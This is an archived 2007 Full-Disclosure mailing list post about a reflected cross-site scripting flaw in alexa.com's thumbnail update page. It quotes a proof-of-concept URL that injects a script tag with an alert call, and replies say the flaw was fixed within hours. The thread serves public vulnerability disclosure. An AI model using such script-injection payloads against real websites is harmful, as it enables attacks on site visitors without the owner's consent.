[Full-disclosure] alexa.com XSS

michele.sandrelli at katamail.com michele.sandrelli at katamail.com
Wed May 30 00:28:44 BST 2007


kefka wrote:
> Seems fixed or doesn't work in FireFox 1.5.0.11
> -----------------------
> MC Iglo wrote:
>>
http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E

It worked perfectly until.. they fixed it : )

Note: It seems that alexa people grep logs or is subscribed to fd since
it worked only for 1-2 hours.

Bye,
Michele Sandrelli




Full-Disclosure is hosted and sponsored by Secunia.